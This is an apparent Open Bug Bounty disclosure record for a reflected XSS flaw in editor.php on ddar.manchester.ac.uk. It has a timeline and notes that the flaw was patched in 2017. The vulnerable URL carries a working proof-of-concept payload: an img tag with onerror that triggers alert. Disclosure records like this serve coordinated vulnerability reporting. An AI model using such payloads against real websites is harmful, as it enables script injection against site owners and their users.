ddar.manchester.ac.uk XSS vulnerability

2015-10-16T16:21:00
ID OBB:92625
Type openbugbounty
Reporter Glubz
Modified 2017-07-25T18:34:00

Description

Vulnerable URL:
http://ddar.manchester.ac.uk/editor.php?p=glubz%22%3E%3Cimg%20src=x%20onerror=window.onerror=alert;throw/xssposed/;//%3E%3C
Details:

Description| Value
---|---
Patched:| Yes, at 25.07.2017
Latest check for patch:| 25.07.2017 18:34 GMT
Vulnerability type:| XSS
Vulnerability status:| Publicly disclosed
Alexa Rank| Unknown / Not calculated
Google Pagerank| 0
VIP website status:| No
Check ddar.manchester.ac.uk SSL connection:| (Grade: A-)

Coordinated Disclosure Timeline:

Description| Value
---|---
Vulnerability reported| 16 October, 2015 16:21 GMT
Vulnerability existence verified and confirmed| 16 October, 2015 16:24 GMT
Vulnerability patched by the website owner| 25 July, 2017 18:34 GMT